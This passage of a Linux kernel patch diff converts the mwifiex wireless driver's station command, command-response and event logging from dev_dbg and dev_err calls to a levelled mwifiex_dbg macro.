Beacon Low Rssi event,\t" + "RSSI:-%d dBm, Freq:%d\n", + subsc_evt_cfg->bcn_l_rssi_cfg.abs_value, + subsc_evt_cfg->bcn_l_rssi_cfg.evt_freq); pos += sizeof(struct mwifiex_ie_types_rssi_threshold); le16_add_cpu(&cmd->size, @@ -1324,10 +1333,11 @@ mwifiex_cmd_802_11_subsc_evt(struct mwifiex_private *priv, rssi_tlv->abs_value = subsc_evt_cfg->bcn_h_rssi_cfg.abs_value; rssi_tlv->evt_freq = subsc_evt_cfg->bcn_h_rssi_cfg.evt_freq; - dev_dbg(priv->adapter->dev, "Cfg Beacon High Rssi event, " - "RSSI:-%d dBm, Freq:%d\n", - subsc_evt_cfg->bcn_h_rssi_cfg.abs_value, - subsc_evt_cfg->bcn_h_rssi_cfg.evt_freq); + mwifiex_dbg(priv->adapter, EVENT, + "Cfg Beacon High Rssi event,\t" + "RSSI:-%d dBm, Freq:%d\n", + subsc_evt_cfg->bcn_h_rssi_cfg.abs_value, + subsc_evt_cfg->bcn_h_rssi_cfg.evt_freq); pos += sizeof(struct mwifiex_ie_types_rssi_threshold); le16_add_cpu(&cmd->size, @@ -1483,12 +1493,14 @@ static int mwifiex_cmd_cfg_data(struct mwifiex_private *priv, data, len); if (ret) return ret; - dev_dbg(adapter->dev, - "download cfg_data from device tree: %s\n", prop->name); + mwifiex_dbg(adapter, INFO, + "download cfg_data from device tree: %s\n", + prop->name); } else if (adapter->cal_data->data && adapter->cal_data->size > 0) { len = mwifiex_parse_cal_cfg((u8 *)adapter->cal_data->data, adapter->cal_data->size, data); - dev_dbg(adapter->dev, 
"download cfg_data from config file\n"); + mwifiex_dbg(adapter, INFO, + "download cfg_data from config file\n"); } else { return -1; } @@ -1603,9 +1615,9 @@ mwifiex_cmd_tdls_oper(struct mwifiex_private *priv, tdls_oper->tdls_action = cpu_to_le16(ACT_TDLS_CONFIG); if (!params) { - dev_err(priv->adapter->dev, - "TDLS config params not available for %pM\n", - oper->peer_mac); + mwifiex_dbg(priv->adapter, ERROR, + "TDLS config params not available for %pM\n", + oper->peer_mac); return -ENODATA; } @@ -1683,7 +1695,7 @@ mwifiex_cmd_tdls_oper(struct mwifiex_private *priv, break; default: - dev_err(priv->adapter->dev, "Unknown TDLS operation\n"); + mwifiex_dbg(priv->adapter, ERROR, "Unknown TDLS operation\n"); return -ENOTSUPP; } @@ -1890,8 +1902,8 @@ int mwifiex_sta_prepare_cmd(struct mwifiex_private *priv, uint16_t cmd_no, ret = mwifiex_cmd_11n_cfg(priv, cmd_ptr, cmd_action, data_buf); break; case HostCmd_CMD_WMM_GET_STATUS: - dev_dbg(priv->adapter->dev, - "cmd: WMM: WMM_GET_STATUS cmd sent\n"); + mwifiex_dbg(priv->adapter, CMD, + "cmd: WMM: WMM_GET_STATUS cmd sent\n"); cmd_ptr->command = cpu_to_le16(HostCmd_CMD_WMM_GET_STATUS); cmd_ptr->size = cpu_to_le16(sizeof(struct host_cmd_ds_wmm_get_status) + @@ -1955,8 +1967,8 @@ int mwifiex_sta_prepare_cmd(struct mwifiex_private *priv, uint16_t cmd_no, data_buf); break; default: - dev_err(priv->adapter->dev, - "PREP_CMD: unknown cmd- %#x\n", cmd_no); + mwifiex_dbg(priv->adapter, ERROR, + "PREP_CMD: unknown cmd- %#x\n", cmd_no); ret = -1; break; } @@ -2047,8 +2059,8 @@ int mwifiex_sta_init_cmd(struct mwifiex_private *priv, u8 first_sta, bool init) &sdio_sp_rx_aggr_enable, true); if (ret) { - dev_err(priv->adapter->dev, - "error while enabling SP aggregation..disable it"); + mwifiex_dbg(priv->adapter, ERROR, + "error while enabling SP aggregation..disable it"); adapter->sdio_rx_aggr_enable = false; } } @@ -2131,8 +2143,8 @@ int mwifiex_sta_init_cmd(struct mwifiex_private *priv, u8 first_sta, bool init) HostCmd_ACT_GEN_SET, DOT11D_I, &state_11d, true); if (ret) - dev_err(priv->adapter->dev, - "11D: failed to enable 11D\n"); + mwifiex_dbg(priv->adapter, ERROR, + "11D: failed to enable 11D\n"); } /* Send cmd to FW to configure 11n specific configuration diff --git a/drivers/net/wireless/mwifiex/sta_cmdresp.c b/drivers/net/wireless/mwifiex/sta_cmdresp.c index efe31a2a90c9..aa5b9a310340 100644 --- a/drivers/net/wireless/mwifiex/sta_cmdresp.c +++ b/drivers/net/wireless/mwifiex/sta_cmdresp.c @@ -49,8 +49,9 @@ mwifiex_process_cmdresp_error(struct mwifiex_private *priv, struct host_cmd_ds_802_11_ps_mode_enh *pm; unsigned long flags; - dev_err(adapter->dev, "CMD_RESP: cmd %#x error, result=%#x\n", - resp->command, resp->result); + mwifiex_dbg(adapter, ERROR, + "CMD_RESP: cmd %#x error, result=%#x\n", + resp->command, resp->result); if (adapter->curr_cmd->wait_q_enabled) adapter->cmd_wait_q.status = -1; @@ -58,9 +59,9 @@ mwifiex_process_cmdresp_error(struct mwifiex_private *priv, switch (le16_to_cpu(resp->command)) { case HostCmd_CMD_802_11_PS_MODE_ENH: pm = &resp->params.psmode_enh; - dev_err(adapter->dev, - "PS_MODE_ENH cmd failed: result=0x%x action=0x%X\n", - resp->result, le16_to_cpu(pm->action)); + mwifiex_dbg(adapter, ERROR, + "PS_MODE_ENH cmd failed: result=0x%x action=0x%X\n", + resp->result, le16_to_cpu(pm->action)); /* We do not re-try enter-ps command in ad-hoc mode. 
*/ if (le16_to_cpu(pm->action) == EN_AUTO_PS && (le16_to_cpu(pm->params.ps_bitmap) & BITMAP_STA_PS) && @@ -91,7 +92,8 @@ mwifiex_process_cmdresp_error(struct mwifiex_private *priv, break; case HostCmd_CMD_SDIO_SP_RX_AGGR_CFG: - dev_err(priv->adapter->dev, "SDIO RX single-port aggregation Not support\n"); + mwifiex_dbg(adapter, MSG, + "SDIO RX single-port aggregation Not support\n"); break; default: @@ -187,29 +189,34 @@ static int mwifiex_ret_802_11_snmp_mib(struct mwifiex_private *priv, u16 query_type = le16_to_cpu(smib->query_type); u32 ul_temp; - dev_dbg(priv->adapter->dev, "info: SNMP_RESP: oid value = %#x," - " query_type = %#x, buf size = %#x\n", - oid, query_type, le16_to_cpu(smib->buf_size)); + mwifiex_dbg(priv->adapter, INFO, + "info: SNMP_RESP: oid value = %#x,\t" + "query_type = %#x, buf size = %#x\n", + oid, query_type, le16_to_cpu(smib->buf_size)); if (query_type == HostCmd_ACT_GEN_GET) { ul_temp = le16_to_cpu(*((__le16 *) (smib->value))); if (data_buf) *data_buf = ul_temp; switch (oid) { case FRAG_THRESH_I: - dev_dbg(priv->adapter->dev, - "info: SNMP_RESP: FragThsd =%u\n", ul_temp); + mwifiex_dbg(priv->adapter, INFO, + "info: SNMP_RESP: FragThsd =%u\n", + ul_temp); break; case RTS_THRESH_I: - dev_dbg(priv->adapter->dev, - "info: SNMP_RESP: RTSThsd =%u\n", ul_temp); + mwifiex_dbg(priv->adapter, INFO, + "info: SNMP_RESP: RTSThsd =%u\n", + ul_temp); break; case SHORT_RETRY_LIM_I: - dev_dbg(priv->adapter->dev, - "info: SNMP_RESP: TxRetryCount=%u\n", ul_temp); + mwifiex_dbg(priv->adapter, INFO, + "info: SNMP_RESP: TxRetryCount=%u\n", + ul_temp); break; case DTIM_PERIOD_I: - dev_dbg(priv->adapter->dev, - "info: SNMP_RESP: DTIM period=%u\n", ul_temp); + mwifiex_dbg(priv->adapter, INFO, + "info: SNMP_RESP: DTIM period=%u\n", + ul_temp); default: break; } @@ -426,14 +433,15 @@ static int mwifiex_ret_tx_power_cfg(struct mwifiex_private *priv, priv->tx_power_level = (u16) pg->power_min; break; default: - dev_err(adapter->dev, "CMD_RESP: unknown cmd action %d\n", - action); + mwifiex_dbg(adapter, ERROR, + "CMD_RESP: unknown cmd action %d\n", + action); return 0; } - dev_dbg(adapter->dev, - "info: Current TxPower Level = %d, Max Power=%d, Min Power=%d\n", - priv->tx_power_level, priv->max_tx_power_level, - priv->min_tx_power_level); + mwifiex_dbg(adapter, INFO, + "info: Current TxPower Level = %d, Max Power=%d, Min Power=%d\n", + priv->tx_power_level, priv->max_tx_power_level, + priv->min_tx_power_level); return 0; } @@ -454,10 +462,10 @@ static int mwifiex_ret_rf_tx_power(struct mwifiex_private *priv, priv->min_tx_power_level = txp->min_power; } - dev_dbg(priv->adapter->dev, - "Current TxPower Level=%d, Max Power=%d, Min Power=%d\n", - priv->tx_power_level, priv->max_tx_power_level, - priv->min_tx_power_level); + mwifiex_dbg(priv->adapter, INFO, + "Current TxPower Level=%d, Max Power=%d, Min Power=%d\n", + priv->tx_power_level, priv->max_tx_power_level, + priv->min_tx_power_level); return 0; } @@ -473,18 +481,18 @@ static int mwifiex_ret_rf_antenna(struct mwifiex_private *priv, struct mwifiex_adapter *adapter = priv->adapter; if (adapter->hw_dev_mcs_support == HT_STREAM_2X2) - dev_dbg(adapter->dev, - "RF_ANT_RESP: Tx action = 0x%x, Tx Mode = 0x%04x" - " Rx action = 0x%x, Rx Mode = 0x%04x\n", - le16_to_cpu(ant_mimo->action_tx), - le16_to_cpu(ant_mimo->tx_ant_mode), - le16_to_cpu(ant_mimo->action_rx), - le16_to_cpu(ant_mimo->rx_ant_mode)); + mwifiex_dbg(adapter, INFO, + "RF_ANT_RESP: Tx action = 0x%x, Tx Mode = 0x%04x\t" + "Rx action = 0x%x, Rx Mode = 0x%04x\n", + 
le16_to_cpu(ant_mimo->action_tx), + le16_to_cpu(ant_mimo->tx_ant_mode), + le16_to_cpu(ant_mimo->action_rx), + le16_to_cpu(ant_mimo->rx_ant_mode)); else - dev_dbg(adapter->dev, - "RF_ANT_RESP: action = 0x%x, Mode = 0x%04x\n", - le16_to_cpu(ant_siso->action), - le16_to_cpu(ant_siso->ant_mode)); + mwifiex_dbg(adapter, INFO, + "RF_ANT_RESP: action = 0x%x, Mode = 0x%04x\n", + le16_to_cpu(ant_siso->action), + le16_to_cpu(ant_siso->ant_mode)); return 0; } @@ -502,8 +510,8 @@ static int mwifiex_ret_802_11_mac_address(struct mwifiex_private *priv, memcpy(priv->curr_addr, cmd_mac_addr->mac_addr, ETH_ALEN); - dev_dbg(priv->adapter->dev, - "info: set mac address: %pM\n", priv->curr_addr); + mwifiex_dbg(priv->adapter, INFO, + "info: set mac address: %pM\n", priv->curr_addr); return 0; } @@ -587,7 +595,8 @@ static int mwifiex_ret_802_11_key_material_v1(struct mwifiex_private *priv, if (le16_to_cpu(key->action) == HostCmd_ACT_GEN_SET) { if ((le16_to_cpu(key->key_param_set.key_info) & KEY_MCAST)) { - dev_dbg(priv->adapter->dev, "info: key: GTK is set\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: key: GTK is set\n"); priv->wpa_is_gtk_set = true; priv->scan_block = false; } @@ -617,7 +626,7 @@ static int mwifiex_ret_802_11_key_material_v2(struct mwifiex_private *priv, key_v2 = &resp->params.key_material_v2; if (le16_to_cpu(key_v2->action) == HostCmd_ACT_GEN_SET) { if ((le16_to_cpu(key_v2->key_param_set.key_info) & KEY_MCAST)) { - dev_dbg(priv->adapter->dev, "info: key: GTK is set\n"); + mwifiex_dbg(priv->adapter, INFO, "info: key: GTK is set\n"); priv->wpa_is_gtk_set = true; priv->scan_block = false; } @@ -663,14 +672,14 @@ static int mwifiex_ret_802_11d_domain_info(struct mwifiex_private *priv, - IEEE80211_COUNTRY_STRING_LEN) / sizeof(struct ieee80211_country_ie_triplet)); - dev_dbg(priv->adapter->dev, - "info: 11D Domain Info Resp: no_of_triplet=%d\n", - no_of_triplet); + mwifiex_dbg(priv->adapter, INFO, + "info: 11D Domain Info Resp: no_of_triplet=%d\n", + no_of_triplet); if (no_of_triplet > MWIFIEX_MAX_TRIPLET_802_11D) { - dev_warn(priv->adapter->dev, - "11D: invalid number of triplets %d returned\n", - no_of_triplet); + mwifiex_dbg(priv->adapter, FATAL, + "11D: invalid number of triplets %d returned\n", + no_of_triplet); return -1; } @@ -680,8 +689,8 @@ static int mwifiex_ret_802_11d_domain_info(struct mwifiex_private *priv, case HostCmd_ACT_GEN_GET: break; default: - dev_err(priv->adapter->dev, - "11D: invalid action:%d\n", domain_info->action); + mwifiex_dbg(priv->adapter, ERROR, + "11D: invalid action:%d\n", domain_info->action); return -1; } @@ -843,12 +852,12 @@ static int mwifiex_ret_ibss_coalescing_status(struct mwifiex_private *priv, if (le16_to_cpu(ibss_coal_resp->action) == HostCmd_ACT_GEN_SET) return 0; - dev_dbg(priv->adapter->dev, - "info: new BSSID %pM\n", ibss_coal_resp->bssid); + mwifiex_dbg(priv->adapter, INFO, + "info: new BSSID %pM\n", ibss_coal_resp->bssid); /* If rsp has NULL BSSID, Just return..... 
No Action */ if (is_zero_ether_addr(ibss_coal_resp->bssid)) { - dev_warn(priv->adapter->dev, "new BSSID is NULL\n"); + mwifiex_dbg(priv->adapter, FATAL, "new BSSID is NULL\n"); return 0; } @@ -884,48 +893,48 @@ static int mwifiex_ret_tdls_oper(struct mwifiex_private *priv, case ACT_TDLS_DELETE: if (reason) { if (!node || reason == TDLS_ERR_LINK_NONEXISTENT) - dev_dbg(priv->adapter->dev, - "TDLS link delete for %pM failed: reason %d\n", - cmd_tdls_oper->peer_mac, reason); + mwifiex_dbg(priv->adapter, ERROR, + "TDLS link delete for %pM failed: reason %d\n", + cmd_tdls_oper->peer_mac, reason); else - dev_err(priv->adapter->dev, - "TDLS link delete for %pM failed: reason %d\n", - cmd_tdls_oper->peer_mac, reason); + mwifiex_dbg(priv->adapter, ERROR, + "TDLS link delete for %pM failed: reason %d\n", + cmd_tdls_oper->peer_mac, reason); } else { - dev_dbg(priv->adapter->dev, - "TDLS link delete for %pM successful\n", - cmd_tdls_oper->peer_mac); + mwifiex_dbg(priv->adapter, MSG, + "TDLS link delete for %pM successful\n", + cmd_tdls_oper->peer_mac); } break; case ACT_TDLS_CREATE: if (reason) { - dev_err(priv->adapter->dev, - "TDLS link creation for %pM failed: reason %d", - cmd_tdls_oper->peer_mac, reason); + mwifiex_dbg(priv->adapter, ERROR, + "TDLS link creation for %pM failed: reason %d", + cmd_tdls_oper->peer_mac, reason); if (node && reason != TDLS_ERR_LINK_EXISTS) node->tdls_status = TDLS_SETUP_FAILURE; } else { - dev_dbg(priv->adapter->dev, - "TDLS link creation for %pM successful", - cmd_tdls_oper->peer_mac); + mwifiex_dbg(priv->adapter, MSG, + "TDLS link creation for %pM successful", + cmd_tdls_oper->peer_mac); } break; case ACT_TDLS_CONFIG: if (reason) { - dev_err(priv->adapter->dev, - "TDLS link config for %pM failed, reason %d\n", - cmd_tdls_oper->peer_mac, reason); + mwifiex_dbg(priv->adapter, ERROR, + "TDLS link config for %pM failed, reason %d\n", + cmd_tdls_oper->peer_mac, reason); if (node) node->tdls_status = TDLS_SETUP_FAILURE; } else { - dev_dbg(priv->adapter->dev, - "TDLS link config for %pM successful\n", - cmd_tdls_oper->peer_mac); + mwifiex_dbg(priv->adapter, MSG, + "TDLS link config for %pM successful\n", + cmd_tdls_oper->peer_mac); } break; default: - dev_err(priv->adapter->dev, - "Unknown TDLS command action response %d", action); + mwifiex_dbg(priv->adapter, ERROR, + "Unknown TDLS command action response %d", action); return -1; } @@ -942,8 +951,9 @@ static int mwifiex_ret_subsc_evt(struct mwifiex_private *priv, /* For every subscribe event command (Get/Set/Clear), FW reports the * current set of subscribed events*/ - dev_dbg(priv->adapter->dev, "Bitmap of currently subscribed events: %16x\n", - le16_to_cpu(cmd_sub_event->events)); + mwifiex_dbg(priv->adapter, EVENT, + "Bitmap of currently subscribed events: %16x\n", + le16_to_cpu(cmd_sub_event->events)); return 0; } @@ -953,7 +963,7 @@ static int mwifiex_ret_cfg_data(struct mwifiex_private *priv, struct host_cmd_ds_command *resp) { if (resp->result != HostCmd_RESULT_OK) { - dev_err(priv->adapter->dev, "Cal data cmd resp failed\n"); + mwifiex_dbg(priv->adapter, ERROR, "Cal data cmd resp failed\n"); return -1; } @@ -1021,8 +1031,8 @@ int mwifiex_process_sta_cmdresp(struct mwifiex_private *priv, u16 cmdresp_no, break; case HostCmd_CMD_802_11_BG_SCAN_QUERY: ret = mwifiex_ret_802_11_scan(priv, resp); - dev_dbg(adapter->dev, - "info: CMD_RESP: BG_SCAN result is ready!\n"); + mwifiex_dbg(adapter, CMD, + "info: CMD_RESP: BG_SCAN result is ready!\n"); break; case HostCmd_CMD_TXPWR_CFG: ret = mwifiex_ret_tx_power_cfg(priv, resp); 
@@ -1101,8 +1111,8 @@ int mwifiex_process_sta_cmdresp(struct mwifiex_private *priv, u16 cmdresp_no, / MWIFIEX_SDIO_BLOCK_SIZE) * MWIFIEX_SDIO_BLOCK_SIZE; adapter->curr_tx_buf_size = adapter->tx_buf_size; - dev_dbg(adapter->dev, "cmd: curr_tx_buf_size=%d\n", - adapter->curr_tx_buf_size); + mwifiex_dbg(adapter, CMD, "cmd: curr_tx_buf_size=%d\n", + adapter->curr_tx_buf_size); if (adapter->if_ops.update_mp_end_port) adapter->if_ops.update_mp_end_port(adapter, @@ -1162,8 +1172,9 @@ int mwifiex_process_sta_cmdresp(struct mwifiex_private *priv, u16 cmdresp_no, ret = mwifiex_ret_sdio_rx_aggr_cfg(priv, resp); break; default: - dev_err(adapter->dev, "CMD_RESP: unknown cmd response %#x\n", - resp->command); + mwifiex_dbg(adapter, ERROR, + "CMD_RESP: unknown cmd response %#x\n", + resp->command); break; } diff --git a/drivers/net/wireless/mwifiex/sta_event.c b/drivers/net/wireless/mwifiex/sta_event.c index 0dc7a1d3993d..bed67d403c64 100644 --- a/drivers/net/wireless/mwifiex/sta_event.c +++ b/drivers/net/wireless/mwifiex/sta_event.c @@ -48,7 +48,8 @@ mwifiex_reset_connect_state(struct mwifiex_private *priv, u16 reason_code) if (!priv->media_connected) return; - dev_dbg(adapter->dev, "info: handles disconnect event\n"); + mwifiex_dbg(adapter, INFO, + "info: handles disconnect event\n"); priv->media_connected = false; @@ -104,12 +105,14 @@ mwifiex_reset_connect_state(struct mwifiex_private *priv, u16 reason_code) * it could be used for re-assoc */ - dev_dbg(adapter->dev, "info: previous SSID=%s, SSID len=%u\n", - priv->prev_ssid.ssid, priv->prev_ssid.ssid_len); + mwifiex_dbg(adapter, INFO, + "info: previous SSID=%s, SSID len=%u\n", + priv->prev_ssid.ssid, priv->prev_ssid.ssid_len); - dev_dbg(adapter->dev, "info: current SSID=%s, SSID len=%u\n", - priv->curr_bss_params.bss_descriptor.ssid.ssid, - priv->curr_bss_params.bss_descriptor.ssid.ssid_len); + mwifiex_dbg(adapter, INFO, + "info: current SSID=%s, SSID len=%u\n", + priv->curr_bss_params.bss_descriptor.ssid.ssid, + priv->curr_bss_params.bss_descriptor.ssid.ssid_len); memcpy(&priv->prev_ssid, &priv->curr_bss_params.bss_descriptor.ssid, @@ -127,9 +130,9 @@ mwifiex_reset_connect_state(struct mwifiex_private *priv, u16 reason_code) if (adapter->is_cmd_timedout && adapter->curr_cmd) return; priv->media_connected = false; - dev_dbg(adapter->dev, - "info: successfully disconnected from %pM: reason code %d\n", - priv->cfg_bssid, reason_code); + mwifiex_dbg(adapter, MSG, + "info: successfully disconnected from %pM: reason code %d\n", + priv->cfg_bssid, reason_code); if (priv->bss_mode == NL80211_IFTYPE_STATION || priv->bss_mode == NL80211_IFTYPE_P2P_CLIENT) { cfg80211_disconnected(priv->netdev, reason_code, NULL, 0, @@ -154,13 +157,13 @@ static int mwifiex_parse_tdls_event(struct mwifiex_private *priv, /* reserved 2 bytes are not mandatory in tdls event */ if (event_skb->len < (sizeof(struct mwifiex_tdls_generic_event) - sizeof(u16) - sizeof(adapter->event_cause))) { - dev_err(adapter->dev, "Invalid event length!\n"); + mwifiex_dbg(adapter, ERROR, "Invalid event length!\n"); return -1; } sta_ptr = mwifiex_get_sta_entry(priv, tdls_evt->peer_mac); if (!sta_ptr) { - dev_err(adapter->dev, "cannot get sta entry!\n"); + mwifiex_dbg(adapter, ERROR, "cannot get sta entry!\n"); return -1; } @@ -239,21 +242,21 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) switch (eventcause) { case EVENT_DUMMY_HOST_WAKEUP_SIGNAL: - dev_err(adapter->dev, - "invalid EVENT: DUMMY_HOST_WAKEUP_SIGNAL, ignore it\n"); + mwifiex_dbg(adapter, ERROR, + "invalid EVENT: 
DUMMY_HOST_WAKEUP_SIGNAL, ignore it\n"); break; case EVENT_LINK_SENSED: - dev_dbg(adapter->dev, "event: LINK_SENSED\n"); + mwifiex_dbg(adapter, EVENT, "event: LINK_SENSED\n"); if (!netif_carrier_ok(priv->netdev)) netif_carrier_on(priv->netdev); mwifiex_wake_up_net_dev_queue(priv->netdev, adapter); break; case EVENT_DEAUTHENTICATED: - dev_dbg(adapter->dev, "event: Deauthenticated\n"); + mwifiex_dbg(adapter, EVENT, "event: Deauthenticated\n"); if (priv->wps.session_enable) { - dev_dbg(adapter->dev, - "info: receive deauth event in wps session\n"); + mwifiex_dbg(adapter, INFO, + "info: receive deauth event in wps session\n"); break; } adapter->dbg.num_event_deauth++; @@ -265,10 +268,10 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_DISASSOCIATED: - dev_dbg(adapter->dev, "event: Disassociated\n"); + mwifiex_dbg(adapter, EVENT, "event: Disassociated\n"); if (priv->wps.session_enable) { - dev_dbg(adapter->dev, - "info: receive disassoc event in wps session\n"); + mwifiex_dbg(adapter, INFO, + "info: receive disassoc event in wps session\n"); break; } adapter->dbg.num_event_disassoc++; @@ -280,7 +283,7 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_LINK_LOST: - dev_dbg(adapter->dev, "event: Link lost\n"); + mwifiex_dbg(adapter, EVENT, "event: Link lost\n"); adapter->dbg.num_event_link_lost++; if (priv->media_connected) { reason_code = @@ -290,7 +293,7 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_PS_SLEEP: - dev_dbg(adapter->dev, "info: EVENT: SLEEP\n"); + mwifiex_dbg(adapter, EVENT, "info: EVENT: SLEEP\n"); adapter->ps_state = PS_STATE_PRE_SLEEP; @@ -298,12 +301,12 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_PS_AWAKE: - dev_dbg(adapter->dev, "info: EVENT: AWAKE\n"); + mwifiex_dbg(adapter, EVENT, "info: EVENT: AWAKE\n"); if (!adapter->pps_uapsd_mode && priv->media_connected && adapter->sleep_period.period) { adapter->pps_uapsd_mode = true; - dev_dbg(adapter->dev, - "event: PPS/UAPSD mode activated\n"); + mwifiex_dbg(adapter, EVENT, + "event: PPS/UAPSD mode activated\n"); } adapter->tx_lock_flag = false; if (adapter->pps_uapsd_mode && adapter->gen_null_pkt) { @@ -333,26 +336,26 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) case EVENT_DEEP_SLEEP_AWAKE: adapter->if_ops.wakeup_complete(adapter); - dev_dbg(adapter->dev, "event: DS_AWAKE\n"); + mwifiex_dbg(adapter, EVENT, "event: DS_AWAKE\n"); if (adapter->is_deep_sleep) adapter->is_deep_sleep = false; break; case EVENT_HS_ACT_REQ: - dev_dbg(adapter->dev, "event: HS_ACT_REQ\n"); + mwifiex_dbg(adapter, EVENT, "event: HS_ACT_REQ\n"); ret = mwifiex_send_cmd(priv, HostCmd_CMD_802_11_HS_CFG_ENH, 0, 0, NULL, false); break; case EVENT_MIC_ERR_UNICAST: - dev_dbg(adapter->dev, "event: UNICAST MIC ERROR\n"); + mwifiex_dbg(adapter, EVENT, "event: UNICAST MIC ERROR\n"); cfg80211_michael_mic_failure(priv->netdev, priv->cfg_bssid, NL80211_KEYTYPE_PAIRWISE, -1, NULL, GFP_KERNEL); break; case EVENT_MIC_ERR_MULTICAST: - dev_dbg(adapter->dev, "event: MULTICAST MIC ERROR\n"); + mwifiex_dbg(adapter, EVENT, "event: MULTICAST MIC ERROR\n"); cfg80211_michael_mic_failure(priv->netdev, priv->cfg_bssid, NL80211_KEYTYPE_GROUP, -1, NULL, GFP_KERNEL); @@ -362,7 +365,7 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_ADHOC_BCN_LOST: - dev_dbg(adapter->dev, "event: ADHOC_BCN_LOST\n"); + mwifiex_dbg(adapter, EVENT, "event: ADHOC_BCN_LOST\n"); priv->adhoc_is_link_sensed = false; 
mwifiex_clean_txrx(priv); mwifiex_stop_net_dev_queue(priv->netdev, adapter); @@ -371,17 +374,17 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_BG_SCAN_REPORT: - dev_dbg(adapter->dev, "event: BGS_REPORT\n"); + mwifiex_dbg(adapter, EVENT, "event: BGS_REPORT\n"); ret = mwifiex_send_cmd(priv, HostCmd_CMD_802_11_BG_SCAN_QUERY, HostCmd_ACT_GEN_GET, 0, NULL, false); break; case EVENT_PORT_RELEASE: - dev_dbg(adapter->dev, "event: PORT RELEASE\n"); + mwifiex_dbg(adapter, EVENT, "event: PORT RELEASE\n"); break; case EVENT_EXT_SCAN_REPORT: - dev_dbg(adapter->dev, "event: EXT_SCAN Report\n"); + mwifiex_dbg(adapter, EVENT, "event: EXT_SCAN Report\n"); if (adapter->ext_scan) ret = mwifiex_handle_event_ext_scan_report(priv, adapter->event_skb->data); @@ -389,7 +392,7 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_WMM_STATUS_CHANGE: - dev_dbg(adapter->dev, "event: WMM status changed\n"); + mwifiex_dbg(adapter, EVENT, "event: WMM status changed\n"); ret = mwifiex_send_cmd(priv, HostCmd_CMD_WMM_GET_STATUS, 0, 0, NULL, false); break; @@ -401,13 +404,13 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) mwifiex_send_cmd(priv, HostCmd_CMD_RSSI_INFO, HostCmd_ACT_GEN_GET, 0, NULL, false); priv->subsc_evt_rssi_state = RSSI_LOW_RECVD; - dev_dbg(adapter->dev, "event: Beacon RSSI_LOW\n"); + mwifiex_dbg(adapter, EVENT, "event: Beacon RSSI_LOW\n"); break; case EVENT_SNR_LOW: - dev_dbg(adapter->dev, "event: Beacon SNR_LOW\n"); + mwifiex_dbg(adapter, EVENT, "event: Beacon SNR_LOW\n"); break; case EVENT_MAX_FAIL: - dev_dbg(adapter->dev, "event: MAX_FAIL\n"); + mwifiex_dbg(adapter, EVENT, "event: MAX_FAIL\n"); break; case EVENT_RSSI_HIGH: cfg80211_cqm_rssi_notify(priv->netdev, @@ -416,47 +419,47 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) mwifiex_send_cmd(priv, HostCmd_CMD_RSSI_INFO, HostCmd_ACT_GEN_GET, 0, NULL, false); priv->subsc_evt_rssi_state = RSSI_HIGH_RECVD; - dev_dbg(adapter->dev, "event: Beacon RSSI_HIGH\n"); + mwifiex_dbg(adapter, EVENT, "event: Beacon RSSI_HIGH\n"); break; case EVENT_SNR_HIGH: - dev_dbg(adapter->dev, "event: Beacon SNR_HIGH\n"); + mwifiex_dbg(adapter, EVENT, "event: Beacon SNR_HIGH\n"); break; case EVENT_DATA_RSSI_LOW: - dev_dbg(adapter->dev, "event: Data RSSI_LOW\n"); + mwifiex_dbg(adapter, EVENT, "event: Data RSSI_LOW\n"); break; case EVENT_DATA_SNR_LOW: - dev_dbg(adapter->dev, "event: Data SNR_LOW\n"); + mwifiex_dbg(adapter, EVENT, "event: Data SNR_LOW\n"); break; case EVENT_DATA_RSSI_HIGH: - dev_dbg(adapter->dev, "event: Data RSSI_HIGH\n"); + mwifiex_dbg(adapter, EVENT, "event: Data RSSI_HIGH\n"); break; case EVENT_DATA_SNR_HIGH: - dev_dbg(adapter->dev, "event: Data SNR_HIGH\n"); + mwifiex_dbg(adapter, EVENT, "event: Data SNR_HIGH\n"); break; case EVENT_LINK_QUALITY: - dev_dbg(adapter->dev, "event: Link Quality\n"); + mwifiex_dbg(adapter, EVENT, "event: Link Quality\n"); break; case EVENT_PRE_BEACON_LOST: - dev_dbg(adapter->dev, "event: Pre-Beacon Lost\n"); + mwifiex_dbg(adapter, EVENT, "event: Pre-Beacon Lost\n"); break; case EVENT_IBSS_COALESCED: - dev_dbg(adapter->dev, "event: IBSS_COALESCED\n"); + mwifiex_dbg(adapter, EVENT, "event: IBSS_COALESCED\n"); ret = mwifiex_send_cmd(priv, HostCmd_CMD_802_11_IBSS_COALESCING_STATUS, HostCmd_ACT_GEN_GET, 0, NULL, false); break; case EVENT_ADDBA: - dev_dbg(adapter->dev, "event: ADDBA Request\n"); + mwifiex_dbg(adapter, EVENT, "event: ADDBA Request\n"); mwifiex_send_cmd(priv, HostCmd_CMD_11N_ADDBA_RSP, HostCmd_ACT_GEN_SET, 0, adapter->event_body, 
false); break; case EVENT_DELBA: - dev_dbg(adapter->dev, "event: DELBA Request\n"); + mwifiex_dbg(adapter, EVENT, "event: DELBA Request\n"); mwifiex_11n_delete_ba_stream(priv, adapter->event_body); break; case EVENT_BA_STREAM_TIEMOUT: - dev_dbg(adapter->dev, "event: BA Stream timeout\n"); + mwifiex_dbg(adapter, EVENT, "event: BA Stream timeout\n"); mwifiex_11n_ba_stream_timeout(priv, (struct host_cmd_ds_11n_batimeout *) @@ -464,28 +467,31 @@ int mwifiex_process_sta_event(struct mwifiex_private *priv) break; case EVENT_AMSDU_AGGR_CTRL: ctrl = le16_to_cpu(*(__le16 *)adapter->event_body); - dev_dbg(adapter->dev, "event: AMSDU_AGGR_CTRL %d\n", ctrl); + mwifiex_dbg(adapter, EVENT, + "event: AMSDU_AGGR_CTRL %d\n", ctrl); adapter->tx_buf_size = min_t(u16, adapter->curr_tx_buf_size, ctrl); - dev_dbg(adapter->dev, "event: tx_buf_size %d\n", - adapter->tx_buf_size); + mwifiex_dbg(adapter, EVENT, "event: tx_buf_size %d\n", + adapter->tx_buf_size); break; case 